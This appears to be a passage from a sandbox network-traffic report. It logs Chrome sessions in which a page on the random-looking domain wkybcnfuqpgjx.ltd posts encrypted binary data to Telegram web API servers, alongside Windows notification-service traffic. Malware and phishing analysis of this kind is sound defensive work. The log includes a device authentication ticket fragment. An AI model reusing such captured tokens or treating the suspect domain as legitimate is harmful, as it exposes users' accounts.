                                  64192.168.2.649927149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:55 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 152
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:55 UTC152OUTData Raw: 2a 10 06 78 25 cb 00 4d 53 cb f2 9e 3d 82 c7 ef 86 81 50 55 d2 eb 6c bd 6c d4 ff 86 f6 5b 02 ca b4 bd 0c a8 64 77 0b bf a8 81 da 21 68 61 ba fb 52 2c 43 b9 a4 96 7b ef 17 e1 22 69 51 1b c7 ef b7 66 9a fb ee 5d 03 6b de f1 b1 6d 8f ca fd 03 a5 aa d2 c9 12 0f 5e 8a ca b3 05 3a 1f 89 54 d1 5e b4 00 ac bb cf 74 48 32 7d 16 e0 ee 56 99 40 be 50 d5 83 84 22 05 9d e3 46 76 fb a0 a4 74 01 9f 82 0c 99 ae a3 c5 69 7f aa 4b 57 d4 09 3f d4 57 71 01 94 ea f5 bb 3f
                                  Data Ascii: *x%MS=PUll[dw!haR,C{"iQf]km^:T^tH2}V@P"FvtiKW?Wq?
                                  2025-01-12 00:03:55 UTC408INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:55 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 552
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:55 UTC552INData Raw: 2a 10 06 78 25 cb 00 4d df e8 07 d2 29 bc c3 51 a5 cd 32 d7 e9 53 e7 0b e4 36 e7 47 19 0b bf ef d5 d3 75 06 88 38 6d ba 8f ea 81 9d 4b 6a 48 83 27 75 82 7f 01 77 27 2b 93 10 45 1e b7 c8 18 20 66 2b 80 d5 a6 f8 2f f7 01 f1 88 a8 26 01 f4 69 fa f2 27 71 5a 07 bf 46 97 69 26 e6 81 6d eb ac 01 16 8d 15 4d 26 15 fe 2c 1f fc b6 34 e8 ad 73 1a 62 88 f6 5d 39 dd b4 4b a7 3a 2b 61 15 a2 df 0b af 1e ce 17 62 01 3e 5e f2 2d 9c 9e 87 26 87 a7 d6 9d e4 c2 7f 2e a5 9b 2d 81 f0 46 3d 87 98 76 a1 8b 16 fe 62 bb 8a 7d 16 e8 4a 7e 50 47 bb 07 38 22 2a 27 8a e5 5b d3 ee af 73 cf 1d 95 51 fb 6d 95 65 d5 32 8d 4e 2a 31 d7 be ea fb 44 78 85 79 16 77 bd d8 66 79 3a b5 be 84 f1 30 ca 76 e8 02 71 88 0f e1 6b 34 70 9f ab f2 cf 72 6e df b1 c0 32 79 eb 9b bb bc 0a bc 75 bc d0 cd 3f
                                  Data Ascii: *x%M)Q2S6Gu8mKjH'uw'+E f+/&i'qZFi&mM&,4sb]9K:+ab>^-&.-F=vb}J~PG8"*'[sQme2N*1Dxywfy:0vqk4prn2yu?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  65192.168.2.649926149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:55 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:55 UTC312INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:55 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:03:55 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  66192.168.2.649928149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:55 UTC449OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 88
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:55 UTC88OUTData Raw: 2a 10 06 78 25 cb 00 4d da 09 67 7a 78 52 86 22 a8 fc 70 1d 9b fd da f8 d1 b9 fe 49 d5 24 b0 46 cd 2f b2 95 29 40 ee 9e cb d5 78 19 50 2a 0f 33 80 da 40 0a d0 2c 35 c5 9f 72 4f 41 c4 0d 06 8e f1 56 4c 25 94 38 da bb b9 0c 83 d0 62 aa 18 47 a8 db 99 74 3b bf cd 76
                                  Data Ascii: *x%MgzxR"pI$F/)@xP*3@,5rOAVL%8bGt;v
                                  2025-01-12 00:03:56 UTC408INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:56 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 552
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:56 UTC552INData Raw: 2a 10 06 78 25 cb 00 4d 94 c7 2a 8e 02 1a bc 44 f7 8a bd 9f 59 b3 6f 03 22 fa 3d 02 de 2c 7d 3d d1 57 55 d3 d5 a4 5a ae 90 57 99 b8 f6 72 0b a3 a7 4e 07 70 11 4f 17 83 a2 82 ee 1c db bb c4 0a 66 03 4d 7d 43 c0 f2 31 6c b3 18 04 4a 5c c6 21 c5 2b 09 b5 9d 0e f8 45 6d 60 17 34 2b fb 1a 7c f1 d2 bd 8c 30 23 96 0c f1 01 29 94 77 f8 45 95 17 6a 41 4d a9 f3 48 85 1d d6 d6 a9 04 f7 d2 e2 d6 c8 2e a1 9b ec 5c de b6 c3 ae 8b 8a 66 4d 7c df 56 37 eb 7d 7c 20 69 e3 ed cc 60 a6 a6 39 6e cc cf 5e b3 73 00 bf 2a 0c 5b c7 21 f6 8e 43 20 6f 35 f5 4d 31 8f 49 e5 15 07 28 2e fe f4 f2 77 9b df f0 28 72 9a 17 f9 9d 1d 66 34 03 32 c9 ee b5 c3 76 dd a1 0c 28 3f 3e ec 13 ca ca cf 54 4f 4a 9b 2a 87 6e 26 d9 b8 ef f4 1f 09 01 46 d9 e5 2a 0d 45 8a 66 88 d9 c9 b3 54 a9 e3 aa e4 9d
                                  Data Ascii: *x%M*DYo"=,}=WUZWrNpOfM}C1lJ\!+Em`4+|0#)wEjAMH.\fM|V7}| i`9n^s*[!C o5M1I(.w(rf42v(?>TOJ*n&F*EfT


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  67192.168.2.649929149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:55 UTC541OUTGET /apiws HTTP/1.1
                                  Host: zws2-1.web.telegram.org
                                  Connection: Upgrade
                                  Pragma: no-cache
                                  Cache-Control: no-cache
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Upgrade: websocket
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-WebSocket-Version: 13
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  Sec-WebSocket-Key: v7p9GlL4zYThdh2pidVMrw==
                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                  Sec-WebSocket-Protocol: binary
                                  2025-01-12 00:03:56 UTC193INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:55 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  2025-01-12 00:03:56 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  68192.168.2.649935172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:56 UTC486OUTGET /rlottie-wasm.wasm HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  Accept: */*
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/2976.4e6e9b1254ce313f06c5.js
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  Range: bytes=275924-275924
                                  If-Range: "674840b0-4d890"
                                  2025-01-12 00:03:56 UTC901INHTTP/1.1 206 Partial Content
                                  Date: Sun, 12 Jan 2025 00:03:56 GMT
                                  Content-Type: application/wasm
                                  Content-Length: 1
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:40 GMT
                                  ETag: "674840b0-4d890"
                                  Content-Range: bytes 275924-275924/317584
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8iL0eh0j8UKHg1QXX5HWBhJRbQ4HOd0GmeSwYamd6n6lFcSgmQ07ODt7NVoSyxHWmh%2BxVEP9lFQuuuLQGp7%2FiCic3Y1VnSd7xDTLqdjFZqFrxQHSqwYH9g5Yah9hOv4bcbOfMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2e59be85e71-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1619&rtt_var=641&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1064&delivery_rate=1803582&cwnd=238&unsent_bytes=0&cid=e7720d5607ad1df2&ts=631&x=0"
                                  2025-01-12 00:03:56 UTC1INData Raw: 00
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  69192.168.2.649938149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:56 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:56 UTC312INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:56 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:03:56 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  70192.168.2.649937149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:56 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 504
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:56 UTC504OUTData Raw: 2a 10 06 78 25 cb 00 4d be 24 87 db e3 53 64 37 87 b6 c2 2b fd ad a7 c7 2b 85 68 00 bd 6c 98 f2 84 a9 50 59 59 52 e5 e3 09 45 7d 23 32 d5 73 27 b9 10 15 a3 ea 90 33 34 2c 2d d0 9f 48 34 01 ac 9b 37 af 62 d4 99 45 ef f1 d3 e2 00 01 e6 0e e9 dc 05 c8 a8 06 6d 98 36 9f 4e 90 bd 04 c4 19 a2 ba 99 57 7d a7 5d 7b 27 3a 54 97 7c 0e a4 b5 19 a7 6b e4 c4 b6 53 74 53 b7 e8 09 9d 2d d0 c1 76 87 9f ba 78 06 8d 62 01 68 5d 53 51 e7 6b 35 84 c9 82 ec c9 40 e4 30 0c bb 6e f1 ef 8b ca ae a5 b5 04 16 87 e0 f8 05 92 22 32 5a 1c 66 d6 84 59 84 bf 48 ad da b3 d7 5d b2 90 cc 21 c0 2d a1 2d 1b a1 5f 37 b4 5b 71 1f 29 73 18 53 33 6c 8e 81 12 bd 1e 7c fb 0e a2 6b 39 d4 fc ab aa a0 f9 12 db 46 80 05 0e 04 79 6d 2e eb 4b 66 ec 23 e5 ac eb 93 3d 4c 00 6b 60 0f eb e3 f4 b2 78 9e a9
                                  Data Ascii: *x%M$Sd7++hlPYYRE}#2s'34,-H47bEm6NW}]{':T|kStS-vxbh]SQk5@0n"2ZfYH]!--_7[q)sS3l|k9Fym.Kf#=Lk`x
                                  2025-01-12 00:03:56 UTC408INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:56 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 152
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:56 UTC152INData Raw: 2a 10 06 78 25 cb 00 4d d0 a8 80 3b 72 68 cd e4 2d 50 38 74 08 ca ed 1f c1 9b a0 ac aa e8 03 a8 0e 18 cd 88 65 5d 76 e6 85 9f 68 8f e5 6b c6 df e1 4e 86 c8 0f b1 28 2b b5 d0 ba 92 49 f6 45 05 54 a4 e3 e1 fa bb 64 78 3d 57 df 2a 99 97 58 34 99 45 e3 96 ae e1 c5 e1 34 2a 68 73 96 c9 02 57 ad b9 54 e6 e5 77 4a 45 a5 83 1e 15 cf 36 12 17 cc c2 b1 44 12 5a de 70 2d 83 12 6e de c7 bd 46 1e d9 92 d4 13 18 b9 d5 13 fb 1b 6e cb 4c 15 23 92 19 07 61 7a 42 71 e7
                                  Data Ascii: *x%M;rh-P8te]vhkN(+IETdx=W*X4E4*hsWTwJE6DZp-nFnL#azBq


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  71192.168.2.64993940.115.3.253443
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:56 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4f 32 78 57 52 66 64 4c 31 55 2b 62 34 45 32 64 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 32 61 35 66 30 65 32 63 65 66 38 36 33 36 65 0d 0a 0d 0a
                                  Data Ascii: CNT 1 CON 305MS-CV: O2xWRfdL1U+b4E2d.1Context: 62a5f0e2cef8636e
                                  2025-01-12 00:03:56 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                  2025-01-12 00:03:56 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4f 32 78 57 52 66 64 4c 31 55 2b 62 34 45 32 64 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 32 61 35 66 30 65 32 63 65 66 38 36 33 36 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 35 41 7a 6f 46 32 68 39 41 6f 44 47 6d 6f 72 76 2f 53 70 54 2b 57 55 51 62 70 2f 49 4a 4c 31 43 62 44 33 6d 38 36 4b 6f 34 61 64 51 46 64 75 2b 31 53 78 66 38 76 7a 4e 6a 57 31 6e 34 7a 65 37 63 6f 44 5a 49 46 66 4d 62 55 4a 63 6a 58 5a 57 2b 70 4d 74 4b 78 61 2f 30 64 33 48 56 43 2b 2f 54 58 2b 75 62 6a 67 33 75 44 67 77
                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: O2xWRfdL1U+b4E2d.2Context: 62a5f0e2cef8636e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAR5AzoF2h9AoDGmorv/SpT+WUQbp/IJL1CbD3m86Ko4adQFdu+1Sxf8vzNjW1n4ze7coDZIFfMbUJcjXZW+pMtKxa/0d3HVC+/TX+ubjg3uDgw
                                  2025-01-12 00:03:56 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4f 32 78 57 52 66 64 4c 31 55 2b 62 34 45 32 64 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 32 61 35 66 30 65 32 63 65 66 38 36 33 36 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: O2xWRfdL1U+b4E2d.3Context: 62a5f0e2cef8636e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                  2025-01-12 00:03:56 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                  Data Ascii: 202 1 CON 58
                                  2025-01-12 00:03:56 UTC58INData Raw: 4d 53 2d 43 56 3a 20 75 7a 45 77 70 56 68 6a 6a 30 47 58 6b 4a 44 61 6c 59 4b 2f 32 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                  Data Ascii: MS-CV: uzEwpVhjj0GXkJDalYK/2w.0Payload parsing failed.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  72192.168.2.649940149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:56 UTC449OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 88
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:56 UTC88OUTData Raw: 2a 10 06 78 25 cb 00 4d fa 7f 3e 82 40 ce 4b 1c a9 13 4e 4b 97 67 7c 57 51 05 22 d4 70 6d 4f 33 c1 08 75 89 7e 8f d1 a1 ef 60 41 24 6d a5 0e d1 d6 f5 b3 41 aa 7d a9 41 4f fa 16 44 06 c0 97 1d fb d0 87 28 a8 a9 f3 2f a9 de 5a 1c b2 1b ae 8b ce cd ae 97 10 97 ec 34
                                  Data Ascii: *x%M>@KNKg|WQ"pmO3u~`A$mA}AOD(/Z4
                                  2025-01-12 00:03:57 UTC411INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:57 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 578872
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:57 UTC15973INData Raw: 2a 10 06 78 25 cb 00 4d 6b 5d 2e 70 5c e4 bf 45 c2 f9 d7 f7 2d c7 9d 10 59 9a e3 e5 1c 07 ac d5 a5 bb ea 18 63 61 fd 44 63 a0 21 5f 55 42 46 20 cf 76 7f 69 a2 b2 55 40 a0 11 03 29 bf 23 1a 51 59 43 aa c9 29 d0 f4 2b e8 2f 63 13 9a 7a 5d 35 6a 3b b4 96 58 44 b1 58 f4 e1 91 80 18 94 6f 8c a0 2f b9 fa 51 91 38 fc a4 82 d5 ce fd 83 73 d1 d8 b3 97 5a f4 68 85 bd 96 06 e5 aa 0c ec bb 6a 9f a4 b6 07 55 2f a6 6a 44 1a 3f 86 1a 64 e3 fb 8f f8 19 25 bc 2c 0c d7 67 6e 5c 0b e8 f2 01 d3 eb 1b 75 ba 8b 7d b4 a9 ba e3 1d 91 a2 91 48 85 11 aa 69 de 63 69 4b c4 4d 9a b3 17 bb 70 6f 1b 09 d0 5c ef 52 9a 6a ff 65 80 83 77 f8 53 c3 56 de 2d 07 cf 6f e7 07 29 88 07 76 a6 d4 d2 c3 da c8 6e bf 53 ec ef fe d4 f5 8d 48 97 86 20 40 7e 45 13 21 c1 26 f1 93 a0 5d 6e 8c d2 35 cd 03
                                  Data Ascii: *x%Mk].p\E-YcaDc!_UBF viU@)#QYC)+/cz]5j;XDXo/Q8sZhjU/jD?d%,gn\u}HiciKMpo\RjewSV-o)vnSH @~E!&]n5
